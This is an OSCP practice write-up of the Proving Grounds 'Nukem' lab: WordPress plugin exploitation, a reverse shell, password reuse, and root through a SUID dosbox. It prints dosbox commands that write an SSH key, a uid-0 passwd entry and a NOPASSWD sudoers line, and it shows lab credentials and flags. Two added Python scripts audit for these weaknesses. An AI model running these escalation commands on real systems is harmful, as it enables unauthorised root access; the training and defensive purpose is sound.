[OSCP Practice Series 64] Proving Grounds — Nukem

Ardian Danny
Mar 23, 2024


Machine Type: Linux

The Attack

Several ports are open. Since we can’t access the MySQL port, let’s start by checking port 80.

A WordPress site. Let’s run WPScan.

There’s an upload directory listing and an admin user. Let’s look at the listing while brute-forcing the admin user’s password. There are also some plugins.

The Simple File List plugin we discovered is version 4.2.2, which has an arbitrary file upload vulnerability.

The tutor plugin we discovered is version 1.5.3, which has an LFI vulnerability.
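For the defender’s side of the two plugin findings above, here is an added example that is not part of the original write-up: a Python audit that reads each plugin’s header comment the way WordPress does (Plugin Name and Version from the first 8 KB of the main file), compares the installed version with an operator-supplied minimum, and checks the uploads directory for a missing index.php and for stray PHP files. The plugin slugs, the temporary sample tree, the placeholder minimum versions (99.0.0) and the uploads path are constructed assumptions, not values taken from the page.

```python
"""Added example (not from the write-up or WordPress): inventory WordPress plugins
from their header comments and flag outdated versions and risky upload directories."""
import re
import tempfile
from pathlib import Path

HEADER_FIELDS = ("Plugin Name", "Version")


def parse_plugin_header(text: str) -> dict:
    """Pull header fields out of a plugin's main file. WordPress only inspects
    the first 8 KB of the file, so this does the same."""
    head = text[:8192]
    info = {}
    for field in HEADER_FIELDS:
        # Tolerate the usual comment decoration (' * ', '// ', '#') before the field name.
        pattern = r"^[ \t/*#@]*" + re.escape(field) + r":[ \t]*(.+?)[ \t]*$"
        match = re.search(pattern, head, re.MULTILINE | re.IGNORECASE)
        if match:
            info[field] = match.group(1)
    return info


def version_key(version: str) -> tuple:
    """'4.2.2' -> (4, 2, 2); non-numeric components sort as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", version))


def find_plugins(plugins_dir: Path):
    """Yield (slug, header) for every plugin directory with a recognisable main file."""
    if not plugins_dir.is_dir():
        return
    for plugin_dir in sorted(p for p in plugins_dir.iterdir() if p.is_dir()):
        for php in sorted(plugin_dir.glob("*.php")):
            info = parse_plugin_header(php.read_text(errors="replace"))
            if "Plugin Name" in info:
                yield plugin_dir.name, info
                break


def audit(wp_root: Path, minimum_versions: dict) -> list:
    """Human-readable findings: outdated plugins and an unprotected uploads directory."""
    findings = []
    for slug, info in find_plugins(wp_root / "wp-content" / "plugins"):
        installed = info.get("Version", "0")
        required = minimum_versions.get(slug)
        if required and version_key(installed) < version_key(required):
            findings.append(f"plugin {slug} {installed} is below minimum {required}")
    uploads = wp_root / "wp-content" / "uploads"
    if uploads.is_dir():
        if not (uploads / "index.php").exists():
            findings.append("uploads/ has no index.php; confirm the web server disables directory listing")
        for php in uploads.rglob("*.php"):
            if php.name != "index.php":
                findings.append(f"PHP file under uploads/: {php.relative_to(wp_root)}")
    return findings


def build_sample_site() -> Path:
    """Constructed sample tree mirroring the write-up: two outdated plugins and
    a PHP file sitting inside the uploads directory."""
    root = Path(tempfile.mkdtemp(prefix="wp-audit-"))
    plugins = root / "wp-content" / "plugins"
    for slug, name, version in (
        ("simple-file-list", "Simple File List", "4.2.2"),
        ("tutor", "Tutor", "1.5.3"),
    ):
        (plugins / slug).mkdir(parents=True)
        (plugins / slug / f"{slug}.php").write_text(
            f"<?php\n/*\nPlugin Name: {name}\nVersion: {version}\n*/\n"
        )
    uploads = root / "wp-content" / "uploads" / "simple-file-list"
    uploads.mkdir(parents=True)
    (uploads / "shell.php").write_text("<?php // constructed placeholder, not a real payload\n")
    return root


# Placeholder minimums (assumption): replace with the vendor's fixed versions for your install.
ASSUMED_MINIMUMS = {"simple-file-list": "99.0.0", "tutor": "99.0.0"}

if __name__ == "__main__":
    for line in audit(build_sample_site(), ASSUMED_MINIMUMS):
        print(line)
```

Run it against a real install by pointing audit() at the WordPress root and filling the minimum-version map from the vendor’s changelogs; the missing index.php check is only a hint, since directory listing is ultimately decided by the web server’s Options -Indexes setting.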

Let’s try the Simple File List exploit. We need to modify the payload first to obtain the shell.

I make the payload a simple PHP code execution.

The file got uploaded. Let’s check.

It works, but I encountered an issue with obtaining the shell. So, I decided to insert the Pentest Monkey PHP reverse shell into the script.

We are in!

No wonder I’m having issues getting the shell. We are inside an Arch Linux environment.

We got the database credentials.

/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'commander' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CommanderKeenVorticons1990' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

There’s also a user named ‘commander’ on the machine. Perhaps the database password is the same as the user password.

Nice, we got ‘commander’.

local.txt: 577de43148160ce318ebfa113c35c5c3

We can’t run sudo.

I found a strange SUID binary. After searching for vulnerable ones, it turns out dosbox is vulnerable.

It seems we can perform arbitrary file writes with it. Let’s try writing to root’s authorized_keys file.

LFILE='/root/.ssh/authorized_keys'
/usr/bin/dosbox -c 'mount c /' -c "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDcmhGBzENvyn61dSb13B2hNZZVCyJZSMGytQmYg0cayjdxYKQojQkMGZo9K36KXhzupI1UXW3Xyu/BpM4zTLrVM2vfb7ayP2a3b/HO2hd5SZrRhEuSRCSB8zofdrAf3wekbYABvCS6iiZ15cQyBeu5+jSRDZpdaZN34/F1mh5UIDUZwZMgmuJapTTZqgYnlLqewEgR7BjyFydZxR+kwXkD+9B5jAmQeX34AI5gOoNZwlYbbM/qkD7nNpFVEG58PJG4IwQHoUtkO7MjAYcpIG8I7kTmrJ6pyRN8UFR/mClcvZZUV259RQ5Il1UBG3yYSteDa8tunpb8ugiynPgPDpU647wnsMPH8mli5ozTcBBnHyGrnwLxL481vNiDFDjxfuBoddI8Yxiu1kpP7vrCD5knW5jmK9ykUuej2BvTfZrLyctgEdCDXn0F6dHsMW6kzzeIZq8SULW6GJ1EldM5qkg269NqOSuAckJ9N2KvwKTln68YYg5zLD9tHEVYgaxE4Q0= shatternox@pepper > c:$LFILE" -c exit

Doesn’t work. Let’s try adding an /etc/passwd entry.

openssl passwd asd123
LFILE='/etc/passwd'
/usr/bin/dosbox -c 'mount c /' -c "echo shatternox:\$1\$ZcfsueEb\$XYBEDdtPACqWJML3/drmC1:0:0:root:/root:/bin/bash >> c:$LFILE" -c exit

What the hell, I must have done something wrong. I’ll just add an entry to /etc/sudoers.

LFILE='/etc/sudoers'
/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit

Nice, GG.
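A defender’s counterpart to the privilege-escalation steps above, added here as an example and not part of the original write-up: a Python audit that lists SUID files outside an assumed baseline (a SUID dosbox would surface there), and scans /etc/passwd and /etc/sudoers content for the indicators such writes leave behind: extra uid-0 accounts, password hashes kept in passwd instead of shadow, blanket NOPASSWD grants, and carriage returns from DOS-style line endings. The baseline set, the temporary file tree and the sample passwd/sudoers lines are constructed for the demo.

```python
"""Added example (not from the write-up): audit a host for unexpected SUID
binaries and for tampering indicators in /etc/passwd and /etc/sudoers."""
import os
import stat
import tempfile
from pathlib import Path

# Assumed baseline of SUID programs a typical host legitimately has. On a real
# system derive this from the package manager's file lists, not a hand-written set.
EXPECTED_SUID = {"su", "sudo", "passwd", "mount", "umount", "newgrp", "chsh", "chfn", "gpasswd"}


def find_suid(root: Path) -> list:
    """Regular files under root with the setuid bit, like `find / -perm -4000 -type f`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                st = path.lstat()  # lstat: never follow symlinks while auditing
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root: Path, expected=EXPECTED_SUID) -> list:
    """SUID files whose basename is not in the baseline (a SUID dosbox lands here)."""
    return [p for p in find_suid(root) if p.name not in expected]


def check_passwd(text: str) -> list:
    """Tampering indicators in /etc/passwd content."""
    findings = []
    for lineno, raw in enumerate(text.split("\n"), 1):
        if not raw:
            continue
        if "\r" in raw:
            # A '\r' never belongs in passwd; DOS-style tools write CRLF line endings.
            findings.append(f"passwd:{lineno}: carriage return in entry")
        fields = raw.rstrip("\r").split(":")
        if len(fields) != 7:
            findings.append(f"passwd:{lineno}: malformed entry with {len(fields)} fields")
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append(f"passwd:{lineno}: extra uid-0 account '{user}'")
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append(f"passwd:{lineno}: password hash stored in passwd for '{user}'")
    return findings


def check_sudoers(text: str) -> list:
    """Blanket NOPASSWD grants and stray carriage returns in sudoers content."""
    findings = []
    for lineno, raw in enumerate(text.split("\n"), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "\r" in raw:
            findings.append(f"sudoers:{lineno}: carriage return in entry")
        if "NOPASSWD" in line and line.endswith("ALL"):
            findings.append(f"sudoers:{lineno}: passwordless full sudo: {line}")
    return findings


# Constructed sample content modelled on the entries the write-up appended.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "commander:x:1000:1000::/home/commander:/bin/bash\n"
    "backdoor:$1$constructed$notarealhash:0:0::/root:/bin/bash\r\n"
)
SAMPLE_SUDOERS = (
    "root ALL=(ALL:ALL) ALL\n"
    "%wheel ALL=(ALL:ALL) ALL\n"
    "commander ALL=(ALL) NOPASSWD: ALL\n"
)


def build_sample_tree() -> Path:
    """Constructed filesystem slice: two baseline SUID programs, a SUID dosbox, a plain file."""
    root = Path(tempfile.mkdtemp(prefix="suid-audit-"))
    bindir = root / "usr" / "bin"
    bindir.mkdir(parents=True)
    for name, setuid in (("su", True), ("passwd", True), ("dosbox", True), ("ls", False)):
        path = bindir / name
        path.write_bytes(b"#!/bin/sh\n")  # stand-in for a real binary
        path.chmod(0o755 | (stat.S_ISUID if setuid else 0))
    return root


if __name__ == "__main__":
    for path in unexpected_suid(build_sample_tree()):
        print(f"unexpected SUID binary: {path}")
    for finding in check_passwd(SAMPLE_PASSWD) + check_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

On a live host, feed find_suid() the real root and the two check functions the actual file contents, and keep a hash or inode baseline of /etc/passwd, /etc/sudoers and root’s authorized_keys so that an unexpected change, not just a suspicious entry, raises an alert.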

proof.txt: 5cda2896f4752228d3235ac4ae5e5b92

Ardian Danny

Penetration Tester, Ethical Hacker, CTF Player, and a Cat Lover. My first account got disabled by Medium, but it won’t stop me from sharing the things I love.